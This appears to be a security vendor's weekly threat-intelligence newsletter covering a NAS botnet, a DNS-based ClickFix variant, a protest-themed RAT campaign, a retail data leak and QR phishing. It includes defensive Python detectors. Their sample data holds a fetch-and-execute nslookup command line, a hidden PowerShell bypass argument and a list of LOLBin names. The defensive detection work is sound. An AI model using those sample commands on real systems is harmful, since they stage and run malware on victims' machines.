Here is your weekly summary of news and other public coverage relevant to Vercara, the market leader in DNS, DDoS Mitigation, Web Application Firewalls, and Bot Management. Keep reading to learn about the week’s interesting and informative stories. To see all the OSINT reports, click here.
NOTE: Except where indicated, this report is released as TLP: CLEAR and items in it may be shared but not attributed to Vercara. For more information on the Traffic Light Protocol, the definitions and usage are at https://www.first.org/tlp/.
Feiniu NAS Devices Compromised in Massive Netdragon Botnet Attack
(TLP: CLEAR) Feiniu (fnOS) NAS devices have been targeted in a large-scale, deliberate attack campaign by the Netdragon malware family, first identified in October 2024 and still actively growing as of early 2026. Rather than casting a wide net across device types, the attackers specifically tailored their tooling to fnOS, a platform-specific investment that signals this is not opportunistic scanning but a precise operation with Feiniu devices as the intended prey. Attackers exploit undisclosed vulnerabilities in exposed services to gain initial access, after which they implant a bot capable of executing DDoS attacks and maintaining persistent remote control over the compromised host. By late January 2026, command-and-control panels showed 1,143 active bots, with the total infection count approaching roughly 1,500 devices. The geographic spread is broad: China, the US, Singapore, and Australia are all represented. The affected sectors include IT services and manufacturing, meaning the collateral risk extends well beyond individual home users into business-critical storage infrastructure. A single alarming development came on February 1, 2026, when operators issued a coordinated command across infected devices to delete the rsa_private_key.pem file. The intent remains unclear, but the deliberate targeting of cryptographic key material raises the serious possibility of a forthcoming ransomware or data-encryption phase; the botnet operators may be laying the groundwork for a second, more destructive stage of the campaign. The malware itself is built with a modular architecture consisting of distinct Loader and DDoS components, each carefully adapted to the fnOS environment in ways that complicate both detection and removal.
The Loader component is particularly aggressive in covering its tracks — it wipes logs across multiple system paths, kills competing processes, and dismantles recovery mechanisms so that even a technically capable administrator will struggle to assess the full scope of the compromise.
(TLP: CLEAR) Comments: The shift toward botnets of compromised consumer and IoT devices is not merely a tactical convenience; it fundamentally changes the threat, because the “weapons” in a DDoS attack are indistinguishable from normal network participants right up until the moment they’re weaponized. A laptop, a tablet, and a NAS device are trusted nodes on trusted networks, and that legitimacy is precisely what makes botnet-driven DDoS so difficult to filter at scale. The Netdragon campaign targeting Feiniu NAS devices is a textbook illustration of exactly this dynamic: attackers didn’t build powerful attack servers, they quietly conscripted roughly 1,500 storage devices that sit inside corporate and home networks, behind firewalls, with established network reputations.
(TLP: CLEAR) Recommended best practices/regulations: NIST Special Publication 800-189: “Distributed denial-of-service (DDoS) is a form of attack where the attack traffic is generated from many distributed sources to achieve a high-volume attack and directed towards an intended victim (i.e., system or server). To conduct a direct DDoS attack, the attacker typically makes use of a few powerful computers or a vast number of unsuspecting, compromised third-party devices (e.g., laptops, tablets, cell phones, Internet of Things (IoT) devices, etc.). The latter scenario is often implemented through botnets. In many DDoS attacks, the IP source addresses in the attack messages are “spoofed” to avoid traceability.”
(TLP: CLEAR) DigiCert: Digicert UltraDDoS Protect provides flexible, automated, and always-on protection across 15 Points of Presence (PoPs) and >15Tbps of DDoS mitigation capacity to enable customer availability and performance under even the largest and most complex DDoS attacks (layer 3 through layer 7). An automated intelligence feed that is constantly updating mitigation devices allows protection against emerging attack vectors and common attack sources.
Source: https://cyberpress.org/netdragon-botnet-targets-feiniu-nas/
Microsoft Discloses DNS-Based ClickFix Attack Using Nslookup for Malware Staging
(TLP: CLEAR) Microsoft revealed a new and notably stealthy variant of the ClickFix social engineering tactic that abuses DNS lookups via the Windows “nslookup” command to retrieve malware payloads, departing from the traditional reliance on web requests that security tools are better equipped to detect and block. Rather than directing victims to a malicious URL, the attack routes through DNS infrastructure — a channel that blends far more naturally into normal network traffic and is less likely to trigger alerts. The initial command is executed through cmd.exe and performs a DNS lookup against a hard-coded external DNS server, bypassing the system’s configured resolver entirely. The response is then filtered to extract the “Name:” field, which contains the encoded second-stage payload — effectively turning the DNS protocol into a covert delivery and signaling mechanism that also adds a validation layer before the final malware executes. Once that second stage runs, it downloads a ZIP archive from an external server, extracts a malicious Python script, and kicks off a chain of reconnaissance and discovery commands before dropping a VBScript responsible for launching ModeloRAT, a Python-based remote access trojan previously seen in CrashFix campaigns. To ensure the infection survives reboots, a Windows shortcut (LNK) file pointing to the VBScript is planted in the Windows Startup folder, so the malware launches automatically every time the system starts. The broader appeal of ClickFix is that it sidesteps traditional security controls by having the victims execute the malicious commands themselves, exploiting trust in the instructions provided. That psychological effectiveness has made ClickFix a thriving template, spawning a growing family of social engineering variants, FileFix, JackFix, ConsentFix, CrashFix, and GlitchFix among them, each adapted to different lures, platforms, and delivery mechanisms while keeping the core manipulation intact.
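The pattern described above (cmd.exe running nslookup against a hard-coded resolver, filtering the answer for “Name:”, then executing what comes back) is visible in process-creation telemetry even when the DNS traffic itself is not inspected. The following Python routine is an added example written for this report, not code from Microsoft’s write-up; the process records it scans are constructed, and the exact command syntax the campaign used is not reproduced here, so the regexes are heuristics rather than a signature for the real command.

```python
import ipaddress
import re

# Constructed process-creation records in a Sysmon Event ID 1 style. They are illustrative
# and are not taken from Microsoft's report or from any real incident.
SAMPLE_EVENTS = [
    {   # ClickFix-style: pasted into the Run dialog, explicit resolver, answer parsed and executed
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\cmd.exe",
        "command_line": r'cmd.exe /c "nslookup -type=txt verify.example.test 203.0.113.5 '
                        r'| findstr Name: > %TEMP%\v.cmd & %TEMP%\v.cmd"',
    },
    {   # Routine troubleshooting from an interactive shell
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\nslookup.exe",
        "command_line": "nslookup -type=mx example.test",
    },
    {   # Queries a specific resolver, but nothing is parsed or executed afterwards
        "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "image": r"C:\Windows\System32\nslookup.exe",
        "command_line": "nslookup example.test 192.0.2.53",
    },
]

TOKEN_RE = re.compile(r'[^\s|&><"]+')
# Answer piped through findstr/find and filtered on the "Name:" line of nslookup output.
PARSE_RE = re.compile(r'\|\s*(?:findstr|find)\b[^|]*name:', re.IGNORECASE)
# Filtered output redirected into a script file that is then run in the same command line.
EXEC_RE = re.compile(r'>\s*\S+\.(?:cmd|bat|ps1|vbs|js)\b[^&]*&', re.IGNORECASE)


def explicit_resolver(command_line):
    """Return the first bare IP literal on the command line, i.e. nslookup's optional
    server argument. Any such argument means the OS resolver and cache are bypassed."""
    for tok in TOKEN_RE.findall(command_line):
        if tok.startswith("-"):
            continue
        try:
            return str(ipaddress.ip_address(tok))
        except ValueError:
            continue
    return None


def triage(event):
    """Score one process-creation record. Returns the indicators hit and a severity."""
    cl = event["command_line"]
    indicators = []
    if "nslookup" not in cl.lower():
        return {"severity": "none", "indicators": indicators}
    server = explicit_resolver(cl)
    if server:
        indicators.append(f"explicit_resolver:{server}")
    if PARSE_RE.search(cl):
        indicators.append("answer_parsed_with_findstr")
    if EXEC_RE.search(cl):
        indicators.append("output_written_and_executed")
    if event["parent_image"].lower().endswith("explorer.exe"):
        # explorer.exe as parent is what a Win+R / Run-dialog paste looks like.
        indicators.append("launched_from_explorer_run_dialog")
    if server and ("answer_parsed_with_findstr" in indicators
                   or "output_written_and_executed" in indicators):
        severity = "high"
    elif len(indicators) >= 2:
        severity = "medium"
    elif len(indicators) == 1:
        severity = "low"
    else:
        severity = "info"
    return {"severity": severity, "indicators": indicators}


def scan(events):
    """Return (severity, command_line) for every event that touches nslookup."""
    return [(triage(e)["severity"], e["command_line"]) for e in events
            if triage(e)["severity"] != "none"]


if __name__ == "__main__":
    for sev, cl in scan(SAMPLE_EVENTS):
        print(f"{sev:6s} {cl}")
```

The explicit-resolver check is the one to weight: querying a hard-coded server is uncommon for end users and is exactly what makes the lookup invisible to a protective DNS service that only sees the configured resolver path, so a “high” here should also prompt a check that outbound UDP/TCP 53 to arbitrary hosts is blocked at the egress firewall.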
(TLP: CLEAR) Comments: The DNS-based ClickFix variant represents a meaningful evolution in social engineering. The detail worth fixating on is the deliberate pivot away from web requests toward DNS as a delivery channel, because it signals that threat actors are actively studying which parts of the kill chain are getting flagged and engineering around them. DNS is trusted, ubiquitous, and historically under-inspected, which makes it an ideal covert channel, and using it for payload staging rather than just C2 communication is a clever expansion of that abuse. What makes ClickFix as a family so persistently dangerous isn’t any technical sophistication; it’s the psychological architecture underlying it. By making victims the final executor of the malicious command, attackers effectively launder the infection through human action, neutralizing endpoint controls that would otherwise catch the same behavior if it were automated. The fact that this technique has already branched into several named variants in a short period suggests it has crossed the threshold from clever trick to established social engineering category. Security teams should treat ClickFix variants the way they treat phishing: not as isolated incidents to patch around, but as a durable, evolving category of threat that demands persistent user education, DNS traffic monitoring, and scrutiny of anything invoking cmd.exe or nslookup through the Windows Run dialog.
(TLP: CLEAR) Recommended best practices/regulations: Cybersecurity & Infrastructure Security Agency, Selecting a Protective DNS (PDNS) Service: “The Domain Name System (DNS) is central to the operation of modern networks, translating human-readable domain names into machine-usable Internet Protocol (IP) addresses. DNS makes navigating to a website, sending an email, or making a secure shell connection easier, and is a key component of the Internet’s resilience. As with many Internet protocols, DNS was not built to withstand abuse from bad actors intent on causing harm. ‘Protective DNS’ (PDNS) is different from earlier security-related changes to DNS in that it is envisioned as a security service – not a protocol – that analyzes DNS queries and takes action to mitigate threats, leveraging the existing DNS protocol and architecture.”
(TLP: CLEAR) DigiCert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), filters internal DNS responses from users as well as machines using both defined categories including botnet Command and Control (C2) as well as machine learning to detect previously uncategorized malicious associations and help prevent data exfiltration or malware detonation.
Source: https://thehackernews.com/2026/02/microsoft-discloses-dns-based-clickfix.html
New ‘CRESCENTHARVEST’ Malware Abuses Iran Protest Narrative for RAT Deployment
(TLP: CLEAR) A malware campaign dubbed CRESCENTHARVEST has been identified by the Acronis TRU team, targeting Iranian citizens and overseas supporters of the Iranian protests through politically charged social engineering. Attackers distribute a RAR archive containing what appears to be legitimate protest footage and a Farsi-language document purporting to offer protest updates, but embedded within the archive are two malicious LNK shortcut files disguised as media content. Once opened, these files trigger a PowerShell script that installs a remote access trojan, establishes persistence tied to network connectivity so the malware survives reboots, and uses DLL sideloading through a trusted Google cleanup executable to evade detection. The malware operates in two stages. The first implant targets Google Chrome, decrypting browser encryption keys to harvest credentials, cookies, and session data from applications including Telegram, before exfiltrating everything to an attacker-controlled C2 server. The second implant functions as a full backdoor with keylogging capability, capturing every keystroke and storing it in a hidden file that is uploaded to the C2 server once it reaches a certain size. Acronis notes that CRESCENTHARVEST is a sharp example of threat actors exploiting geopolitical tensions to advance espionage objectives and recommends that individuals aligned with politically sensitive causes treat all unsolicited files with suspicion, use hardware security keys, and implement strong endpoint security measures.
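The lure depends on a shortcut file looking like a video or document inside an archive. Explorer never shows the .lnk extension (shortcuts carry the NeverShowExt registry flag), so “protest_footage.mp4.lnk” renders as “protest_footage.mp4” whether or not extension hiding is enabled. The following Python scanner is an added example for this report, not Acronis tooling: it opens an archive, identifies members by the Shell Link header (HeaderSize 0x4C followed by the CLSID 00021401-0000-0000-C000-000000000046) rather than by name, flags media-looking double extensions, and looks for interpreter names in the shortcut’s UTF-16LE string data. The sample archive is constructed in ZIP form for stdlib convenience (the campaign used RAR, which would need a third-party reader), and the embedded PowerShell arguments are invented.

```python
import io
import zipfile

# Shell Link header: HeaderSize (0x0000004C, little-endian) + LinkCLSID bytes.
LNK_MAGIC = b"\x4c\x00\x00\x00" + bytes.fromhex("0114020000000000c000000000000046")
MEDIA_EXT = {"mp4", "mov", "avi", "mkv", "jpg", "jpeg", "png", "gif", "pdf", "docx"}
# Interpreter / LOLBin names worth flagging inside a shortcut's argument strings.
SUSPICIOUS_STRINGS = [b"powershell", b"cmd.exe", b"mshta", b"rundll32", b"wscript", b"-ep bypass"]


def looks_like_lnk(data: bytes) -> bool:
    """True if the member begins with a Shell Link header, regardless of its name."""
    return data[:20] == LNK_MAGIC


def embedded_strings(data: bytes) -> list:
    """Return suspicious fragments found in ASCII or UTF-16LE (LNK strings are UTF-16LE)."""
    low = data.lower()
    hits = []
    for s in SUSPICIOUS_STRINGS:
        if s in low or s.decode().encode("utf-16-le") in low:
            hits.append(s.decode())
    return hits


def inspect_member(name: str, data: bytes) -> list:
    """Findings for one archive member; an empty list means nothing notable."""
    findings = []
    exts = name.rsplit("/", 1)[-1].lower().split(".")[1:]
    is_lnk = looks_like_lnk(data)
    if is_lnk:
        findings.append("lnk_header")
        if exts and exts[-1] != "lnk":
            findings.append("lnk_with_non_lnk_extension")
    elif "lnk" in exts:
        findings.append("lnk_extension_without_lnk_header")
    # e.g. footage.mp4.lnk: the visible name ends in a media extension, the real one does not.
    if len(exts) >= 2 and exts[-2] in MEDIA_EXT and exts[-1] not in MEDIA_EXT:
        findings.append("double_extension:" + ".".join(exts[-2:]))
    if is_lnk:
        for s in embedded_strings(data):
            findings.append("embedded_command:" + s)
    return findings


def scan_archive(zip_bytes: bytes) -> dict:
    """Map member name -> findings for every member that produced at least one finding."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            findings = inspect_member(info.filename, zf.read(info))
            if findings:
                results[info.filename] = findings
    return results


def build_sample_archive() -> bytes:
    """Constructed lure archive for demonstration: two fake shortcuts plus two benign files.
    The shortcut bodies are a minimal 76-byte header followed by invented argument text."""
    fake_lnk = (LNK_MAGIC + b"\x00" * 56
                + "powershell -w hidden -ep bypass -f stage.ps1".encode("utf-16-le"))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("protest_footage.mp4.lnk", fake_lnk)
        zf.writestr("situation_update.pdf.lnk", fake_lnk)
        zf.writestr("clip01.mp4", b"\x00\x00\x00\x18ftypisom" + b"\x00" * 64)
        zf.writestr("update_fa.docx", b"PK\x03\x04" + b"\x00" * 32)
    return buf.getvalue()


if __name__ == "__main__":
    for member, findings in scan_archive(build_sample_archive()).items():
        print(member, "->", ", ".join(findings))
```

Checking the header rather than the filename matters because an attacker can name the member anything; the reverse check (a .lnk name without the header) catches corrupted or decoy files. A mail gateway or EDR rule that blocks archives containing any Shell Link member, or at least any member whose visible name ends in a media extension, removes this lure class outright.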
(TLP: CLEAR) Comments: What makes CRESCENTHARVEST particularly concerning from a spread perspective is that it doesn’t rely on technical exploitation to find its victims. It relies on empathy. By packaging malware inside content that sympathizers of the Iranian protests would actively want to open and share (protest footage, images, situation reports), the attackers essentially turned the target community’s own solidarity against them. That is a self-propagating social dynamic that no patch can fix. A supporter receives what looks like a compelling update from the ground, opens it, and potentially forwards the same archive to others in their network who share the same sympathies, each one a new infection point. The use of LNK files disguised as media content exploits a well-known but persistently effective Windows behavior, hiding file extensions from casual users, meaning the barrier to accidental execution is extremely low, especially for non-technical recipients who are emotionally invested in the content they believe they’re viewing. The persistence mechanism is also worth highlighting in the context of spread: by triggering on network connection rather than just system startup, the malware ensures it re-establishes contact with its C2 every time the victim joins a new network, which is particularly dangerous for activists or diaspora members who frequently move between locations and networks. Taken together, this campaign is a reminder that the most effective malware distribution strategies in 2026 aren’t about exploiting software. They’re about exploiting the specific emotional and political context of a target community with enough precision that the victims become unwitting vectors of their own surveillance.
(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) DE.CM-01: “Networks and network services are monitored to find potentially adverse events”. One of the ways to detect phishing, malware droppers, and command and control (C2) is at the network level. Intrusion Detection Systems (IDS), Intrusion Prevention Systems (IPS), and next-generation firewalls can be used with a protective DNS solution to detect these malicious activities as they traverse the network, even if the initial infection occurs via physical media or on another network such as a hotel or airport.
(TLP: CLEAR) DigiCert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), can detect and block malware delivery and command and control (C2) techniques such as phishing, domain generation algorithms, and DNS tunneling to reduce both the quantity and impact of infections.
Source: https://cyberpress.org/crescentharvest-exploits-protest-for-rat/
Canada Goose Investigating as Hackers Leak 600K Customer Records
(TLP: CLEAR) ShinyHunters, a prolific data extortion group, has added Canada Goose to its dark web leak site, claiming to have stolen over 600,000 customer records. The 1.67 GB dataset, released in JSON format, contains detailed e-commerce order records including customer names, email addresses, phone numbers, billing and shipping addresses, IP addresses, order histories, partial payment card data, device and browser information, and order values — enough to profile high-value customers for targeted phishing, social engineering, and fraud. Canada Goose is aware of the dataset but has found no evidence of a breach of its own systems, stating the data appears to relate to historical customer transactions and that no unmasked financial data was involved. It remains unknown how many customers will be affected or whether individual notifications will be issued, as Canada Goose says its review of the dataset’s accuracy and scope is still ongoing.
(TLP: CLEAR) Comments: Stating there is “no evidence of a breach of our own systems” is a reasonable and important distinction to make, and one that reflects a genuinely complex reality in modern retail cybersecurity: companies often share customer data with third-party service providers as a necessary part of doing business, and breaches can occur several steps removed from the brand itself. If the third-party explanation holds up, it would be a reminder that supply chain security remains one of the more difficult challenges for any organization to manage, particularly when vendor relationships involve sensitive customer data.
(TLP: CLEAR) Recommended best practices/regulations: PCI-DSS V4.0 Section 5.2: “An anti-malware solution(s) is deployed on all system components, except for those system components identified in periodic evaluations per Requirement 5.2.3 that concludes the system components are not at risk from malware.” Using a combination of agent-based and network-based detection, such as with a Protective DNS solution, provides overlapping protection not only for conventional IT assets such as laptops, desktops, and some servers but also for non-standard IT assets such as IoT devices and some servers that cannot run anti-malware software.
(TLP: CLEAR) DigiCert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), receives DNS queries from enterprise users and other on-LAN devices and inspects the DNS response for indicators of malicious activity such as phishing, ransomware, and acceptable usage policy violations.
QR Codes Exploited for Phishing Attacks and Malware Spread on Mobile Devices
(TLP: CLEAR) QR code abuse has become a significant mobile threat vector, with attackers embedding malicious codes in emails, documents, and websites to deliver phishing pages, trigger account takeovers, and distribute malicious applications outside official app stores. Because people routinely scan QR codes for payments, menus, and app downloads, these attacks often bypass enterprise protections by shifting the interaction to less-protected personal smartphones — where email filters and web proxies have limited visibility into QR-encoded content compared to plain URLs. Attackers commonly chain multiple redirects, starting with a benign-looking domain, passing through a URL shortener, and landing on a phishing page impersonating webmail or cloud platforms. The APWG reported more than 1 million phishing attacks in Q1 2025, with QR codes playing a growing role in evading filtering. Financial services are the most heavily impacted industry, accounting for 29% of attacks involving compromised QR code shorteners, with qrs[.]ly alone appearing in over 7% of observed malicious QR URLs. Beyond credential phishing, the article highlights two additional attack vectors. In-app deep links allow QR codes to trigger specific actions inside messaging apps like Telegram, WhatsApp, Signal, and Line — a technique documented in use by state-aligned actors to abuse legitimate app features for long-term interception of sensitive communications targeting military and government personnel. QR codes are also being used to distribute malicious Android APK files directly, bypassing app store vetting entirely to deliver spyware, banking trojans, and adware, with these APKs frequently requesting extensive permissions including camera access, location tracking, and account management.
The article recommends that organizations combine user education with technical controls including QR-aware URL filtering, mobile sandboxing for deep-link behavior, and strict policies restricting sideloaded applications on corporate devices.
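The three vectors above (shortener-backed redirect chains to credential pages, in-app deep links, and direct APK delivery) can all be triaged once the QR payload has been decoded to text, which is the step most gateways skip. The Python routine below is an added example for this report, not from the article or any vendor product: it assumes the image has already been decoded to a string, follows redirects hop by hop without executing the landing page, and applies the “QR-aware URL filtering” and deep-link checks the article recommends. The redirect chain and domains it walks are constructed (qrs[.]ly is the one shortener named above; the others are well-known public shorteners), so it runs offline; swap `fake_fetch` for a real HEAD request that does not follow redirects to use it on live codes.

```python
from urllib.parse import urljoin, urlparse

SHORTENERS = {"qrs.ly", "bit.ly", "t.co", "tinyurl.com"}
# Custom schemes that open a messaging app or an Android intent straight from the scanner.
DEEP_LINK_SCHEMES = {"tg", "whatsapp", "sgnl", "line", "intent"}
# Words that rarely belong in a third-party hostname but are common in credential lures.
BRAND_WORDS = ("office", "outlook", "microsoft", "onedrive", "sharepoint", "webmail", "login", "signin")
REDIRECT_STATUSES = {301, 302, 303, 307, 308}

# Constructed stand-in for live HTTP responses: url -> (status, headers). No network access.
FAKE_WEB = {
    "https://menu.example-restaurant.test/qr": (302, {"Location": "https://qrs.ly/a1b2c3"}),
    "https://qrs.ly/a1b2c3": (301, {"Location": "https://login-office365.example-evil.test/auth"}),
    "https://login-office365.example-evil.test/auth": (200, {"Content-Type": "text/html"}),
    "https://cdn.example-evil.test/update.apk": (200, {"Content-Type": "application/vnd.android.package-archive"}),
    "https://www.example.test/menu.pdf": (200, {"Content-Type": "application/pdf"}),
}


def fake_fetch(url):
    """Return (status, headers) for a URL from the constructed table; 404 if unknown."""
    return FAKE_WEB.get(url, (404, {}))


def follow_chain(url, fetch, max_hops=5):
    """Walk Location headers manually so every intermediate host is recorded.
    Returns (chain, final_status, final_headers); final_status is None if still redirecting."""
    chain = [url]
    for _ in range(max_hops):
        status, headers = fetch(chain[-1])
        if status in REDIRECT_STATUSES and "Location" in headers:
            chain.append(urljoin(chain[-1], headers["Location"]))
        else:
            return chain, status, headers
    return chain, None, {}


def triage_qr(payload, fetch=fake_fetch):
    """Classify one decoded QR payload as allow / review / block with the reasons."""
    parsed = urlparse(payload.strip())
    scheme = parsed.scheme.lower()
    if scheme in DEEP_LINK_SCHEMES:
        # Deep links act inside the app with no page to inspect; treat as block on managed devices.
        return {"verdict": "block", "chain": [payload], "findings": [f"in_app_deep_link:{scheme}"]}
    if scheme not in ("http", "https"):
        return {"verdict": "review", "chain": [payload], "findings": ["non_url_payload"]}

    chain, status, headers = follow_chain(payload, fetch)
    findings = []
    for host in (urlparse(u).hostname or "" for u in chain):
        if host in SHORTENERS:
            findings.append(f"shortener:{host}")
    if len(chain) > 2:
        findings.append(f"redirect_hops:{len(chain) - 1}")
    final_host = urlparse(chain[-1]).hostname or ""
    if any(w in final_host for w in BRAND_WORDS):
        findings.append(f"brand_keyword_in_host:{final_host}")
    content_type = headers.get("Content-Type", "")
    if chain[-1].lower().endswith(".apk") or "android.package-archive" in content_type:
        findings.append("android_apk_download")
    if status is None:
        findings.append("redirect_loop_or_too_many_hops")

    if any(f.startswith(("android_apk_download", "brand_keyword_in_host")) for f in findings):
        verdict = "block"
    elif findings:
        verdict = "review"
    else:
        verdict = "allow"
    return {"verdict": verdict, "chain": chain, "findings": findings}


if __name__ == "__main__":
    for code in ("https://menu.example-restaurant.test/qr", "tg://resolve?domain=example_channel",
                 "https://cdn.example-evil.test/update.apk", "https://www.example.test/menu.pdf"):
        r = triage_qr(code)
        print(r["verdict"], "->".join(r["chain"]), r["findings"])
```

Following the chain manually, rather than letting an HTTP client auto-follow, is what surfaces the shortener hop; a verdict of “review” on any shortener is reasonable for a corporate scanner since legitimate menu and payment codes almost never need one.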
(TLP: CLEAR) Comments: What makes QR code-based attacks particularly difficult to address is that the vulnerability isn’t primarily technical, it’s behavioral. QR codes have been normalized through years of legitimate use in restaurants, retail, banking, and public spaces, and that familiarity has created a near-automatic scan reflex in most users that bypasses the same skepticism they might apply to a suspicious link in an email. The finding that many email filters and web proxies still have limited visibility into QR-encoded content is especially concerning, because it means that organizations investing heavily in email security may have a significant blind spot sitting right alongside their other controls.
(TLP: CLEAR) Recommended best practices/regulations: PCI-DSS V4.0 Section 5.2: “An anti-malware solution(s) is deployed on all system components, except for those system components identified in periodic evaluations per Requirement 5.2.3 that concludes the system components are not at risk from malware.” Using a combination of agent-based and network-based detection, such as with a Protective DNS solution, provides overlapping protection not only for conventional IT assets such as laptops, desktops, and some servers but also for non-standard IT assets such as IoT devices and some servers that cannot run anti-malware software.
(TLP: CLEAR) DigiCert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), functions as a complement to anti-virus and Endpoint Detection and Response (EDR) agents to reduce the total amount of malware infections.
Traffic Light Protocol (TLP)
Except where noted, this report is released as TLP: CLEAR and items in it may be shared but not attributed to Vercara. For more information on the Traffic Light Protocol, the definitions and usage are at https://www.first.org/tlp/.
About Vercara
The world’s top brands depend on Vercara to safeguard their digital infrastructure and online presence. Vercara offers a suite of cloud-delivered services that are always secure, reliable, and available and enable global businesses to thrive online. UltraSecure protects organizations’ networks and applications against risks and downtime, ensuring that businesses and their customers enjoy exceptional and uninterrupted interactions all day, every day. Delivering the industry’s best performance and always-on service, Vercara’s mission-critical security portfolio provides best-in-class DNS, application, and network security, including DDoS, WAF, and Bot management services to its global 5000 customers and beyond.
To learn more about Vercara solutions, please contact us.